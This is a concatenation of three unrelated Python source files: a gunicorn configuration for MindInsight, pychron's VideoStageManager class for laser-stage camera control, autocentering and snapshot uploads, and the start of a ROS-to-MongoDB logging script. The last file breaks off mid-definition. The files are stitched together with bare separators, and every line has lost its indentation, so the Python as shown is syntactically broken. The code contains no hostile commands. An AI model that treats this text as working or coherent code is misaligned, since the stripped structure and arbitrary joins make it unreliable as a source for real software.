# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Config file for gunicorn."""
import os
import threading
from importlib import import_module
import gunicorn
gunicorn.SERVER_SOFTWARE = 'unknown'
worker_class = 'sync'
workers = 1
threads = min(30, os.cpu_count() * 2 + 1)
worker_connections = 1000
timeout = 30
graceful_timeout = 30
daemon = True
captureoutput = True
# write gunicorn default log to stream, and using mindinsight logger write gunicorn log to file.
accesslog = '-'
def on_starting(server):
"""Hook function on starting gunicorn process."""
hook_module = import_module('mindinsight.utils.hook')
for hook in hook_module.HookUtils.instance().hooks():
threading.Thread(target=hook.on_startup, args=(server.log,)).start()
|
video_stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import shutil
import time
from threading import Timer, Event as TEvent
from apptools.preferences.preference_binding import bind_preference
from numpy import copy
from skimage.color import gray2rgb
from skimage.draw import circle_perimeter, line
# ============= enthought library imports =======================
from traits.api import (
Instance,
String,
Property,
Button,
Bool,
Event,
on_trait_change,
Str,
Float,
Enum,
Int,
)
from pychron.canvas.canvas2D.camera import Camera, YamlCamera, BaseCamera
from pychron.core.helpers.binpack import pack, encode_blob
from pychron.core.helpers.filetools import unique_path, unique_path_from_manifest
from pychron.core.ui.stage_component_editor import VideoComponentEditor
from pychron.core.ui.thread import Thread as QThread
from pychron.core.ui.thread import sleep
from pychron.core.yaml import yload
from pychron.image.video import Video, pil_save
from pychron.mv.lumen_detector import LumenDetector
from pychron.paths import paths
from .stage_manager import StageManager
try:
from pychron.canvas.canvas2D.video_laser_tray_canvas import VideoLaserTrayCanvas
except ImportError:
from pychron.canvas.canvas2D.laser_tray_canvas import (
LaserTrayCanvas as VideoLaserTrayCanvas,
)
class VideoStageManager(StageManager):
""" """
video = Instance(Video)
camera = Instance(BaseCamera)
canvas_editor_klass = VideoComponentEditor
camera_zoom_coefficients = Property(
String(enter_set=True, auto_set=False), depends_on="_camera_zoom_coefficients"
)
_camera_zoom_coefficients = String
use_auto_center_interpolation = Bool(False)
configure_camera_device_button = Button
autocenter_button = Button("AutoCenter")
configure_autocenter_button = Button("Configure")
autocenter_manager = Instance("pychron.mv.autocenter_manager.AutoCenterManager")
autofocus_manager = Instance("pychron.mv.focus.autofocus_manager.AutoFocusManager")
# zoom_calibration_manager = Instance(
# 'pychron.mv.zoom.zoom_calibration.ZoomCalibrationManager')
snapshot_button = Button("Snapshot")
snapshot_mode = Enum("Single", "3 Burst", "10 Burst")
auto_save_snapshot = Bool(True)
record = Event
record_label = Property(depends_on="is_recording")
is_recording = Bool
use_db = False
use_video_archiver = Bool(True)
video_archiver = Instance("pychron.core.helpers.archiver.Archiver")
video_identifier = Str
# use_video_server = Bool(False)
# video_server_port = Int
# video_server_quality = Int
# video_server = Instance('pychron.image.video_server.VideoServer')
use_media_storage = Bool(False)
auto_upload = Bool(False)
keep_local_copy = Bool(False)
lumen_detector = Instance(LumenDetector)
render_with_markup = Bool(False)
burst_delay = Int(250)
_auto_correcting = False
stop_timer = Event
pxpermm = Float(23)
_measure_grain_t = None
_measure_grain_evt = None
grain_polygons = None
dimension_multiplier = Float(1)
def motor_event_hook(self, name, value, *args, **kw):
if name == "zoom":
self._update_zoom(value)
def bind_preferences(self, pref_id):
self.debug("binding preferences")
super(VideoStageManager, self).bind_preferences(pref_id)
if self.autocenter_manager:
self.autocenter_manager.bind_preferences(pref_id)
# bind_preference(self.autocenter_manager, 'use_autocenter',
# '{}.use_autocenter'.format(pref_id))
bind_preference(
self, "render_with_markup", "{}.render_with_markup".format(pref_id)
)
bind_preference(self, "burst_delay", "{}.burst_delay".format(pref_id))
bind_preference(self, "auto_upload", "{}.auto_upload".format(pref_id))
bind_preference(
self, "use_media_storage", "{}.use_media_storage".format(pref_id)
)
bind_preference(self, "keep_local_copy", "{}.keep_local_copy".format(pref_id))
bind_preference(
self, "dimension_multiplier", "{}.dimension_multiplier".format(pref_id)
)
bind_preference(
self, "use_video_archiver", "{}.use_video_archiver".format(pref_id)
)
bind_preference(self, "video_identifier", "{}.video_identifier".format(pref_id))
bind_preference(self, "use_video_server", "{}.use_video_server".format(pref_id))
bind_preference(
self.video_archiver,
"archive_months",
"{}.video_archive_months".format(pref_id),
)
bind_preference(
self.video_archiver, "archive_days", "{}.video_archive_days".format(pref_id)
)
bind_preference(
self.video_archiver,
"archive_hours",
"{}.video_archive_hours".format(pref_id),
)
bind_preference(
self.video_archiver, "root", "{}.video_directory".format(pref_id)
)
# bind_preference(self.video, 'output_mode',
# '{}.video_output_mode'.format(pref_id))
# bind_preference(self.video, 'ffmpeg_path',
# '{}.ffmpeg_path'.format(pref_id))
def get_grain_polygon(self):
ld = self.lumen_detector
l, m = ld.lum()
return m.tostring()
def get_grain_polygon_blob(self):
# self.debug('Get grain polygons n={}'.format(len(self.grain_polygons)))
try:
t, md, p = next(self.grain_polygons)
a = pack("ff", ((t, md),))
b = pack("HH", p)
return encode_blob(a + b)
except (StopIteration, TypeError) as e:
self.debug("No more grain polygons. {}".format(e))
def stop_measure_grain_polygon(self):
self.debug("Stop measure polygons {}".format(self._measure_grain_evt))
if self._measure_grain_evt:
self._measure_grain_evt.set()
return True
def start_measure_grain_polygon(self):
self._measure_grain_evt = evt = TEvent()
def _measure_grain_polygon():
ld = self.lumen_detector
dim = self.get_target_dimension()
ld.pxpermm = self.pxpermm
self.debug("Starting measure grain polygon")
masks = []
display_image = self.autocenter_manager.display_image
mask_dim = self.get_mask_dimension()
mask_dim_mm = mask_dim * self.pxpermm
ld.grain_measuring = True
while not evt.is_set():
src = self._get_preprocessed_src()
if src is not None:
targets = ld.find_targets(
display_image,
src,
dim,
mask=mask_dim,
search={"start_offset_scalar": 1},
)
if targets:
t = time.time()
targets = [
(t, mask_dim_mm, ti.poly_points.tolist()) for ti in targets
]
masks.extend(targets)
sleep(0.1)
ld.grain_measuring = False
self.grain_polygons = (m for m in masks)
self.debug("exiting measure grain")
self._measure_grain_t = QThread(target=_measure_grain_polygon)
self._measure_grain_t.start()
return True
def start_recording(
self, path=None, use_dialog=False, basename="vm_recording", **kw
):
""" """
directory = None
if os.path.sep in basename:
args = os.path.split(basename)
directory, basename = os.path.sep.join(args[:-1]), args[-1]
if path is None:
if use_dialog:
path = self.save_file_dialog()
else:
vd = self.video_archiver.root
self.debug("video archiver root {}".format(vd))
if not vd:
vd = paths.video_dir
if directory:
vd = os.path.join(vd, directory)
if not os.path.isdir(vd):
os.mkdir(vd)
path = unique_path_from_manifest(vd, basename, extension="avi")
kw["path"] = path
kw["basename"] = basename
self._start_recording(**kw)
self.is_recording = True
return path
def stop_recording(self, user="remote", delay=None):
""" """
def close():
self.is_recording = False
self.info("stop video recording")
p = self.video.output_path
if self.video.stop_recording(wait=True):
if self.auto_upload:
try:
p = self._upload(p, inform=False)
except BaseException as e:
self.critical("Failed uploading {}. error={}".format(p, e))
return p
if self.video.is_recording():
if delay:
t = Timer(delay, close)
t.start()
else:
return close()
@property
def video_configuration_path(self):
if self.configuration_dir_path:
return os.path.join(self.configuration_dir_path, "camera.yaml")
def initialize_video(self):
if self.video:
identifier = 0
p = self.video_configuration_path
if os.path.isfile(p):
yd = yload(p)
vid = yd["Device"]
identifier = vid.get("identifier", 0)
self.video.open(identifier=identifier)
self.video.load_configuration(p)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def initialize_stage(self):
super(VideoStageManager, self).initialize_stage()
self.initialize_video()
# s = self.stage_controller
# if s.axes:
# xa = s.axes['x'].drive_ratio
# ya = s.axes['y'].drive_ratio
# self._drive_xratio = xa
# self._drive_yratio = ya
self._update_zoom(0)
def autocenter(self, *args, **kw):
return self._autocenter(*args, **kw)
def snapshot(
self,
path=None,
name=None,
auto=False,
inform=True,
return_blob=False,
pic_format=".jpg",
include_raw=True,
):
"""
path: abs path to use
name: base name to use if auto saving in default dir
auto: force auto save
returns:
path: local abs path
upath: remote abs path
"""
if path is None:
if self.auto_save_snapshot or auto:
if name is None:
name = "snapshot"
path = unique_path_from_manifest(paths.snapshot_dir, name, pic_format)
elif name is not None:
if not os.path.isdir(os.path.dirname(name)):
path = unique_path_from_manifest(
paths.snapshot_dir, name, pic_format
)
else:
path = name
else:
path = self.save_file_dialog()
if path:
self.info("saving snapshot {}".format(path))
# play camera shutter sound
# play_sound('shutter')
if include_raw:
frame = self.video.get_cached_frame()
head, _ = os.path.splitext(path)
raw_path = "{}.tif".format(head)
pil_save(frame, raw_path)
self._render_snapshot(path)
if self.auto_upload:
if include_raw:
self._upload(raw_path)
upath = self._upload(path, inform=inform)
if upath is None:
upath = ""
if inform:
if self.keep_local_copy:
self.information_dialog(
'Snapshot saved: "{}".\nUploaded : "{}"'.format(
path, upath
)
)
else:
self.information_dialog(
'Snapshot uploaded to "{}"'.format(upath)
)
else:
upath = None
if inform:
self.information_dialog('Snapshot saved to "{}"'.format(path))
if return_blob:
with open(path, "rb") as rfile:
im = rfile.read()
return path, upath, im
else:
return path, upath
def kill(self):
""" """
super(VideoStageManager, self).kill()
if self.camera:
self.camera.save_calibration()
self.stop_timer = True
self.canvas.close_video()
if self.video:
self.video.close(force=True)
# if self.use_video_server:
# self.video_server.stop()
# if self._stage_maps:
# for s in self._stage_maps:
# s.dump_correction_file()
self.clean_video_archive()
def clean_video_archive(self):
if self.use_video_archiver:
self.info("Cleaning video directory")
self.video_archiver.clean(("manifest.yaml",))
def is_auto_correcting(self):
return self._auto_correcting
def cancel_auto_correcting(self):
self.autocenter_manager.cancel()
return True
crop_width = 5
crop_height = 5
def get_scores(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
return ld.get_scores(src, **kw)
def find_lum_peak(self, min_distance, blur, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.get_target_dimension()
mask_dim = dim * 1.05
# mask_dim_mm = mask_dim * self.pxpermm
if src is not None and src.ndim >= 2:
return ld.find_lum_peak(
src, dim, mask_dim, blur=blur, min_distance=min_distance, **kw
)
def get_brightness(self, **kw):
ld = self.lumen_detector
src = self._get_preprocessed_src()
dim = self.get_target_dimension()
return ld.get_value(src, dim, **kw)
# src = self.video.get_cached_frame()
# csrc = copy(src)
# src, v = ld.get_value(csrc, **kw)
# return csrc, src, v
def get_frame_size(self):
cw = 2 * self.crop_width * self.pxpermm
ch = 2 * self.crop_height * self.pxpermm
return cw, ch
def close_open_images(self):
if self.autocenter_manager:
self.autocenter_manager.close_open_images()
def finish_move_to_hole(self, user_entry):
self.debug("finish move to hole")
# if user_entry and not self.keep_images_open:
# self.close_open_images()
def get_preprocessed_src(self):
return self._get_preprocessed_src()
def get_target_dimension(self, hole=None):
dim = self.stage_map.g_dimension
if hole:
if isinstance(hole, (int, str)):
hole = self.stage_map.get_hole(hole)
dim = hole.dimension
return dim * self.dimension_multiplier
def get_mask_dimension(self):
return self.get_target_dimension() * 1.05
# private
def _get_preprocessed_src(self):
ld = self.lumen_detector
src = copy(self.video.get_cached_frame())
dim = self.get_target_dimension()
ld.pxpermm = self.pxpermm
offx, offy = self.canvas.get_screen_offset()
cropdim = dim * 2.5
if src is not None:
if len(src.shape):
src = ld.crop(src, cropdim, cropdim, offx, offy, verbose=False)
return src
def _stage_map_changed_hook(self):
self.lumen_detector.hole_radius = self.get_target_dimension()
def _upload(self, src, inform=True):
if not self.use_media_storage:
msg = "Use Media Storage not enabled in Laser preferences"
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
else:
srv = "pychron.media_storage.manager.MediaStorageManager"
msm = self.parent.application.get_service(srv)
if msm is not None:
d = os.path.split(os.path.dirname(src))[-1]
dest = os.path.join(self.parent.name, d, os.path.basename(src))
msm.put(src, dest)
if not self.keep_local_copy:
self.debug("removing {}".format(src))
if src.endswith(".avi"):
head, ext = os.path.splitext(src)
vd = "{}-images".format(head)
self.debug("removing video build directory {}".format(vd))
shutil.rmtree(vd)
os.remove(src)
dest = "{}/{}".format(msm.get_base_url(), dest)
return dest
else:
msg = "Media Storage Plugin not enabled"
if inform:
self.warning_dialog(msg)
else:
self.warning(msg)
def _render_snapshot(self, path):
from chaco.plot_graphics_context import PlotGraphicsContext
c = self.canvas
p = None
was_visible = False
if not self.render_with_markup:
p = c.show_laser_position
c.show_laser_position = False
if self.points_programmer.is_visible:
c.hide_all()
was_visible = True
gc = PlotGraphicsContext((int(c.outer_width), int(c.outer_height)))
c.do_layout()
gc.render_component(c)
# gc.save(path)
from pychron.core.helpers import save_gc
save_gc.save(gc, path)
if p is not None:
c.show_laser_position = p
if was_visible:
c.show_all()
def _start_recording(self, path, basename):
self.info("start video recording {}".format(path))
d = os.path.dirname(path)
if not os.path.isdir(d):
self.warning("invalid directory {}".format(d))
self.warning("using default directory")
path, _ = unique_path(paths.video_dir, basename, extension="avi")
self.info("saving recording to path {}".format(path))
# if self.use_db:
# db = self.get_video_database()
# db.connect()
#
# v = db.add_video_record(rid=basename)
# db.add_path(v, path)
# self.info('saving {} to database'.format(basename))
# db.commit()
video = self.video
crop_to_hole = True
dim = self.get_target_dimension()
cropdim = dim * 8 * self.pxpermm
color = self.canvas.crosshairs_color.getRgb()[:3]
r = int(self.canvas.get_crosshairs_radius() * self.pxpermm)
# offx, offy = self.canvas.get_screen_offset()
def renderer(p):
# cw, ch = self.get_frame_size()
frame = video.get_cached_frame()
if frame is not None:
if not len(frame.shape):
return
frame = copy(frame)
# ch, cw, _ = frame.shape
# ch, cw = int(ch), int(cw)
if crop_to_hole:
frame = video.crop(frame, 0, 0, cropdim, cropdim)
if self.render_with_markup:
# draw crosshairs
if len(frame.shape) == 2:
frame = gray2rgb(frame)
ch, cw, _ = frame.shape
ch, cw = int(ch), int(cw)
y = ch // 2
x = cw // 2
cp = circle_perimeter(y, x, r, shape=(ch, cw))
frame[cp] = color
frame[line(y, 0, y, x - r)] = color # left
frame[line(y, x + r, y, int(cw) - 1)] = color # right
frame[line(0, x, y - r, x)] = color # bottom
frame[line(y + r, x, int(ch) - 1, x)] = color # top
if frame is not None:
pil_save(frame, p)
self.video.start_recording(path, renderer)
def _move_to_hole_hook(self, holenum, correct, autocentered_position):
args = holenum, correct, autocentered_position
self.debug(
"move to hole hook holenum={}, "
"correct={}, autocentered_position={}".format(*args)
)
if correct:
ntries = 1 if autocentered_position else 3
self._auto_correcting = True
try:
self._autocenter(holenum=holenum, ntries=ntries, save=True)
except BaseException as e:
self.critical("Autocentering failed. {}".format(e))
self._auto_correcting = False
# def find_center(self):
# ox, oy = self.canvas.get_screen_offset()
# rpos, src = self.autocenter_manager.calculate_new_center(
# self.stage_controller.x,
# self.stage_controller.y,
# ox, oy,
# dim=self.stage_map.g_dimension, open_image=False)
#
# return rpos, src
# def find_target(self):
# if self.video:
# ox, oy = self.canvas.get_screen_offset()
# src = self.video.get_cached_frame()
#
# ch = cw = self.pxpermm * self.stage_map.g_dimension * 2.5
# src = self.video.crop(src, ox, oy, cw, ch)
# return self.lumen_detector.find_target(src)
#
# def find_best_target(self):
# if self.video:
# src = self.video.get_cached_frame()
# src = self.autocenter_manager.crop(src)
# return self.lumen_detector.find_best_target(src)
def _autocenter(self, holenum=None, ntries=3, save=False, inform=False):
self.debug("do autocenter")
rpos = None
interp = False
sm = self.stage_map
st = time.time()
if self.autocenter_manager.use_autocenter:
time.sleep(0.1)
dim = self.get_target_dimension()
shape = sm.g_shape
if holenum is not None:
hole = sm.get_hole(holenum)
if hole is not None:
dim = self.get_target_dimension(holenum)
shape = hole.shape
ox, oy = self.canvas.get_screen_offset()
for ti in range(max(1, ntries)):
# use machine vision to calculate positioning error
rpos = self.autocenter_manager.calculate_new_center(
self.stage_controller.x,
self.stage_controller.y,
ox,
oy,
dim=dim,
shape=shape,
)
if rpos is not None:
self.linear_move(
*rpos,
block=True,
source="autocenter",
use_calibration=False,
update_hole=False,
velocity_scalar=0.1
)
time.sleep(0.1)
else:
self.snapshot(
auto=True,
name="pos_err_{}_{}".format(holenum, ti),
inform=inform,
)
break
# if use_interpolation and rpos is None:
# self.info('trying to get interpolated position')
# rpos = sm.get_interpolated_position(holenum)
# if rpos:
# s = '{:0.3f},{:0.3f}'
# interp = True
# else:
# s = 'None'
# self.info('interpolated position= {}'.format(s))
if rpos:
corrected = True
# add an adjustment value to the stage map
if save and holenum is not None:
sm.set_hole_correction(holenum, *rpos)
sm.dump_correction_file()
# f = 'interpolation' if interp else 'correction'
else:
# f = 'uncorrected'
corrected = False
if holenum is not None:
hole = sm.get_hole(holenum)
if hole:
rpos = hole.nominal_position
self.debug("Autocenter duration ={}".format(time.time() - st))
return rpos, corrected, interp
# ===============================================================================
# views
# ===============================================================================
# ===============================================================================
# view groups
# ===============================================================================
# ===============================================================================
# handlers
# ===============================================================================
def _configure_camera_device_button_fired(self):
if self.video:
self.video.load_configuration(self.video_configuration_path)
if hasattr(self.video.cap, "reload_configuration"):
self.video.cap.reload_configuration(self.video_configuration_path)
self.lumen_detector.pixel_depth = self.video.pixel_depth
def _update_zoom(self, v):
if self.camera:
self._update_xy_limits()
@on_trait_change("parent:motor_event")
def _update_motor(self, new):
print("motor event", new, self.canvas, self.canvas.camera)
# s = self.stage_controller
if self.camera:
if not isinstance(new, (int, float)):
args, _ = new
name, v = args[:2]
else:
name = "zoom"
v = new
if name == "zoom":
self._update_xy_limits()
# pxpermm = self.canvas.camera.set_limits_by_zoom(v, s.x, s.y)
# self.pxpermm = pxpermm
elif name == "beam":
self.lumen_detector.beam_radius = v / 2.0
def _pxpermm_changed(self, new):
if self.autocenter_manager:
self.autocenter_manager.pxpermm = new
self.lumen_detector.pxpermm = new
# self.lumen_detector.mask_radius = new*self.stage_map.g_dimension
def _autocenter_button_fired(self):
self.goto_position(self.calibrated_position_entry, autocenter_only=True)
# def _configure_autocenter_button_fired(self):
# info = self.autocenter_manager.edit_traits(view='configure_view',
# kind='livemodal')
# if info.result:
# self.autocenter_manager.dump_detector()
def _snapshot_button_fired(self):
n = 1
if self.snapshot_mode == "3 Burst":
n = 3
elif self.snapshot_mode == "10 Burst":
n = 10
bd = self.burst_delay * 0.001
delay = n > 1
for i in range(n):
st = time.time()
self.snapshot(inform=False)
if delay:
time.sleep(max(0, bd - time.time() + st))
def _record_fired(self):
# time.sleep(4)
# self.stop_recording()
if self.is_recording:
self.stop_recording()
else:
self.start_recording()
def _use_video_server_changed(self):
if self.use_video_server:
self.video_server.start()
else:
self.video_server.stop()
def _get_camera_zoom_coefficients(self):
return self.camera.zoom_coefficients
def _set_camera_zoom_coefficients(self, v):
self.camera.zoom_coefficients = ",".join(map(str, v))
self._update_xy_limits()
def _validate_camera_zoom_coefficients(self, v):
try:
return list(map(float, v.split(",")))
except ValueError:
pass
def _update_xy_limits(self):
z = 0
if self.parent is not None:
zoom = self.parent.get_motor("zoom")
if zoom is not None:
z = zoom.data_position
x = self.stage_controller.get_current_position("x")
y = self.stage_controller.get_current_position("y")
if self.camera:
pxpermm = self.camera.set_limits_by_zoom(z, x, y, self.canvas)
self.pxpermm = pxpermm
self.debug("updated xy limits zoom={}, pxpermm={}".format(z, pxpermm))
self.canvas.request_redraw()
def _get_record_label(self):
return "Start Recording" if not self.is_recording else "Stop"
# ===============================================================================
# factories
# ===============================================================================
def _canvas_factory(self):
""" """
v = VideoLaserTrayCanvas(stage_manager=self, padding=30)
return v
def _canvas_editor_factory(self):
e = super(VideoStageManager, self)._canvas_editor_factory()
e.stop_timer = "stop_timer"
return e
# ===============================================================================
# defaults
# ===============================================================================
def _camera_default(self):
klass = YamlCamera
# p = os.path.join(self.configuration_dir_path, 'camera.yaml')
p = self.video_configuration_path
if p is not None:
if not os.path.isfile(p):
klass = Camera
pp = os.path.join(self.configuration_dir_path, "camera.cfg")
if not os.path.isfile(pp):
self.warning_dialog(
"No Camera configuration file a {} or {}".format(p, pp)
)
p = pp
camera = klass()
camera.load(p)
else:
camera = Camera()
camera.set_limits_by_zoom(0, 0, 0, self.canvas)
self._camera_zoom_coefficients = camera.zoom_coefficients
return camera
def _lumen_detector_default(self):
ld = LumenDetector()
ld.pixel_depth = self.video.pixel_depth
return ld
def _video_default(self):
v = Video()
self.canvas.video = v
return v
def _video_server_default(self):
from pychron.image.video_server import VideoServer
return VideoServer(video=self.video)
def _video_archiver_default(self):
from pychron.core.helpers.archiver import Archiver
return Archiver()
def _autocenter_manager_default(self):
if self.parent.mode != "client":
# from pychron.mv.autocenter_manager import AutoCenterManager
if "co2" in self.parent.name.lower():
from pychron.mv.autocenter_manager import CO2AutocenterManager
klass = CO2AutocenterManager
else:
from pychron.mv.autocenter_manager import DiodeAutocenterManager
klass = DiodeAutocenterManager
return klass(
video=self.video, canvas=self.canvas, application=self.application
)
def _autofocus_manager_default(self):
if self.parent.mode != "client":
from pychron.mv.focus.autofocus_manager import AutoFocusManager
return AutoFocusManager(
video=self.video,
laser_manager=self.parent,
stage_controller=self.stage_controller,
canvas=self.canvas,
application=self.application,
)
# def _zoom_calibration_manager_default(self):
# if self.parent.mode != 'client':
# from pychron.mv.zoom.zoom_calibration import ZoomCalibrationManager
# return ZoomCalibrationManager(laser_manager=self.parent)
# ===============================================================================
# calcualte camera params
# ===============================================================================
# def _calculate_indicator_positions(self, shift=None):
# ccm = self.camera_calibration_manager
#
# zoom = self.parent.zoom
# pychron, name = self.video_manager.snapshot(identifier=zoom)
# ccm.image_factory(pychron=pychron)
#
# ccm.process_image()
# ccm.title = name
#
# cond = Condition()
# ccm.cond = cond
# cond.acquire()
# do_later(ccm.edit_traits, view='snapshot_view')
# if shift:
# self.stage_controller.linear_move(*shift, block=False)
#
# cond.wait()
# cond.release()
#
# def _calculate_camera_parameters(self):
# ccm = self.camera_calibration_manager
# self._calculate_indicator_positions()
# if ccm.result:
# if self.calculate_offsets:
# rdxmm = 5
# rdymm = 5
#
# x = self.stage_controller.x + rdxmm
# y = self.stage_controller.y + rdymm
# self.stage_controller.linear_move(x, y, block=True)
#
# time.sleep(2)
#
# polygons1 = ccm.polygons
# x = self.stage_controller.x - rdxmm
# y = self.stage_controller.y - rdymm
# self._calculate_indicator_positions(shift=(x, y))
#
# polygons2 = ccm.polygons
#
# # compare polygon sets
# # calculate pixel displacement
# dxpx = sum([sum([(pts1.x - pts2.x)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
# dypx = sum([sum([(pts1.y - pts2.y)
# for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# for p1, p2 in zip(polygons1, polygons2)]) / len(polygons1)
#
# # convert pixel displacement to mm using defined mapping
# dxmm = dxpx / self.pxpercmx
# dymm = dypx / self.pxpercmy
#
# # calculate drive offset. ratio of request/actual
# try:
# self.drive_xratio = rdxmm / dxmm
# self.drive_yratio = rdymm / dymm
# except ZeroDivisionError:
# self.drive_xratio = 100
#
# def _calibration_manager_default(self):
#
# # self.video.open(user = 'calibration')
# return CalibrationManager(parent = self,
# laser_manager = self.parent,
# video_manager = self.video_manager,
# )
# ============= EOF ====================================
# adxs = []
# adys = []
# for p1, p2 in zip(polygons, polygons2):
# # dxs = []
# # dys = []
# # for pts1, pts2 in zip(p1.points, p2.points):
# #
# # dx = pts1.x - pts2.x
# # dy = pts1.y - pts2.y
# # dxs.append(dx)
# # dys.append(dy)
# # dxs = [(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]
# # dys = [(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]
# #
# adx = sum([(pts1.x - pts2.x) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
# ady = sum([(pts1.y - pts2.y) for pts1, pts2 in zip(p1.points, p2.points)]) / len(p1.points)
#
# # adx = sum(dxs) / len(dxs)
# # ady = sum(dys) / len(dys)
# adxs.append(adx)
# adys.append(ady)
# print 'xffset', sum(adxs) / len(adxs)
# print 'yffset', sum(adys) / len(adys)
|
mongodb_log.py
|
#!/usr/bin/python
###########################################################################
# mongodb_log.py - Python based ROS to MongoDB logger (multi-process)
#
# Created: Sun Dec 05 19:45:51 2010
# Copyright 2010-2012 Tim Niemueller [www.niemueller.de]
# 2010-2011 Carnegie Mellon University
# 2010 Intel Labs Pittsburgh
###########################################################################
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# Read the full text in the LICENSE.GPL file in the doc directory.
# make sure we aren't using floor division
from __future__ import division, with_statement
PACKAGE_NAME='mongodb_log'
NODE_NAME='mongodb_log'
NODE_NAME_TEMPLATE='%smongodb_log'
WORKER_NODE_NAME = "%smongodb_log_worker_%d_%s"
QUEUE_MAXSIZE = 100
# import roslib; roslib.load_manifest(PACKAGE_NAME)
import rospy
# for msg_to_document
import mongodb_store.util
import os
import re
import sys
import time
import pprint
import string
import signal
import subprocess
from threading import Thread, Timer
from Queue import Empty
from optparse import OptionParser
from tempfile import mktemp
from datetime import datetime, timedelta
from time import sleep
from random import randint
from tf.msg import tfMessage
from sensor_msgs.msg import PointCloud, CompressedImage
from roslib.packages import find_node
#from rviz_intel.msg import TriangleMesh
use_setproctitle = True
try:
from setproctitle import setproctitle
except ImportError:
use_setproctitle = False
use_processes = False
# if use_processes:
from multiprocessing import Process, Lock, Condition, Queue, Value, current_process, Event
import multiprocessing as mp
# else:
# from threading import Lock, Condition, Event
# from Queue import Queue
# def Value(t, val, lock=None):
# return val
import genpy
import rosgraph.masterapi
import roslib.message
#from rospy import Time, Duration
import rostopic
from pymongo import SLOW_ONLY
from pymongo.errors import InvalidDocument, InvalidStringData
MongoClient = mongodb_store.util.import_MongoClient()
BACKLOG_WARN_LIMIT = 100
STATS_LOOPTIME = 10
STATS_GRAPHTIME = 60
class Counter(object):
def __init__(self, value = None, lock = True):
self.count = value or Value('i', 0, lock=lock)
self.mutex = Lock()
def increment(self, by = 1):
with self.mutex: self.count.value += by
def value(self):
with self.mutex: return self.count.value
class Barrier(object):
def __init__(self, num_threads):
self.num_threads = num_threads
self.threads_left = Value('i', num_threads, lock=True)
self.mutex = Lock()
self.waitcond = Condition(self.mutex)
def wait(self):
self.mutex.acquire()
self.threads_left.value -= 1
if self.threads_left.value == 0:
self.threads_left.value = self.num_threads
self.waitcond.notify_all()
self.mutex.release()
else:
self.waitcond.wait()
self.mutex.release()
class WorkerProcess(object):
def __init__(self, idnum, topic, collname, in_counter_value, out_counter_value,
drop_counter_value, queue_maxsize,
mongodb_host, mongodb_port, mongodb_name, nodename_prefix):
self.name = "WorkerProcess-%4d-%s" % (idnum, topic)
self.id = idnum
self.topic = topic
self.collname = collname
self.queue = Queue(queue_maxsize)
self.out_counter = Counter(out_counter_value)
self.in_counter = Counter(in_counter_value)
self.drop_counter = Counter(drop_counter_value)
self.worker_out_counter = Counter()
self.worker_in_counter = Counter()
self.worker_drop_counter = Counter()
self.mongodb_host = mongodb_host
self.mongodb_port = mongodb_port
self.mongodb_name = mongodb_name
self.nodename_prefix = nodename_prefix
self.quit = Value('i', 0)
# print "Creating process %s" % self.name
self.process = Process(name=self.name, target=self.run)
# self.process = Thread(name=self.name, target=self.run)
# print "created %s" % self.process
self.process.start()
# print "started %s" % self.process
def init(self):
global use_setproctitle
if use_setproctitle:
setproctitle("mongodb_log %s" % self.topic)
self.mongoconn = MongoClient(self.mongodb_host, self.mongodb_port)
self.mongodb = self.mongoconn[self.mongodb_name]
self.mongodb.set_profiling_level = SLOW_ONLY
self.collection = self.mongodb[self.collname]
self.collection.count()
self.queue.cancel_join_thread()
# clear signal handlers in this child process, rospy will handle signals for us
signal.signal(signal.SIGTERM, signal.SIG_DFL)
signal.signal(signal.SIGINT, signal.SIG_DFL)
worker_node_name = WORKER_NODE_NAME % (self.nodename_prefix, self.id, self.collname)
# print "Calling init_node with %s from process %s" % (worker_node_name, mp.current_process())
rospy.init_node(worker_node_name, anonymous=False)
self.subscriber = None
while not self.subscriber and not self.is_quit():
try:
msg_class, real_topic, msg_eval = rostopic.get_topic_class(self.topic, blocking=True)
self.subscriber = rospy.Subscriber(real_topic, msg_class, self.enqueue, self.topic)
except rostopic.ROSTopicIOException:
print("FAILED to subscribe, will keep trying %s" % self.name)
time.sleep(randint(1,10))
except rospy.ROSInitException:
print("FAILED to initialize, will keep trying %s" % self.name)
time.sleep(randint(1,10))
self.subscriber = None
def run(self):
self.init()
print("ACTIVE: %s" % self.name)
# run the thread
self.dequeue()
# free connection
# self.mongoconn.end_request()
def is_quit(self):
return self.quit.value == 1
def shutdown(self):
if not self.is_quit():
#print("SHUTDOWN %s qsize %d" % (self.name, self.queue.qsize()))
self.quit.value = 1
self.queue.put("shutdown")
while not self.queue.empty(): sleep(0.1)
#print("JOIN %s qsize %d" % (self.name, self.queue.qsize()))
self.process.join()
self.process.terminate()
def qsize(self):
